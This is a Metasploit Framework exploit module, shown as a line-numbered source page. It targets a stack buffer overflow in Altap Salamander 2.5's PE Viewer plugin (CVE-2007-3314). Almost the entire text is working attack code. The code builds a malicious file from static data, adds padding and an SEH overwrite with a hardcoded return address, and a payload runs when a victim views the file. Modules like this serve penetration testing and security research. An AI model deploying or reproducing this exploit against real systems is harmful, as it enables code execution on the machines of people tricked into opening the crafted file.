Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/altap_salamander_pdb.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Altap Salamander 2.5 PE Viewer Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in Altap Salamander <= v2.5.

19
          By creating a malicious file and convincing a user to view the file with

20
          the Portable Executable Viewer plugin within a vulnerable version of

21
          Salamander, the PDB file string is copied onto the stack and the

22
          SEH can be overwritten.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [ 'aushack' ],

26
        'References' => [

27
          [ 'CVE', '2007-3314' ],

28
          [ 'BID', '24557' ],

29
          [ 'OSVDB', '37579' ],

30
          [ 'URL', 'http://vuln.sg/salamander25-en.html' ],

31
        ],

32
        'DefaultOptions' => {

33
          'EXITFUNC' => 'process',

34
          'DisablePayloadHandler' => true

35
        },

36
        'Payload' => {

37
          'Space' => 1024,

38
          'BadChars' => "\x00\x0d\x0a=:\\/%$^&*",

39
          'StackAdjustment' => -3500,

40
        },

41
        'Platform' => 'win',

42
        'Targets' => [

43
          [ 'Universal Salamander 2.5', { 'Ret' => 0x23920b59 } ], # pop ebx; pop eax; ret salrtl.dll

44
        ],

45
        'Privileged' => false,

46
        'DisclosureDate' => '2007-06-19',

47
        'DefaultTarget' => 0,

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        OptString.new('FILENAME', [ false, 'The file name.', 'msf-salamander-pdb.exe'])

59
      ]

60
    )

61
  end

62


63
  def exploit

64
    seh = generate_seh_payload(target.ret)

65


66
    # load the static pdb file beginning

67
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2007-3314.dat")

68
    fd = File.open(path, "rb")

69
    sploit = fd.read(fd.stat.size)

70
    fd.close

71


72
    sploit << rand_text_alphanumeric(1098) + seh

73
    sploit << ".pdb"

74


75
    print_status("Creating '#{datastore['FILENAME']}' file ...")

76


77
    file_create(sploit)

78
  end

79
end

80


81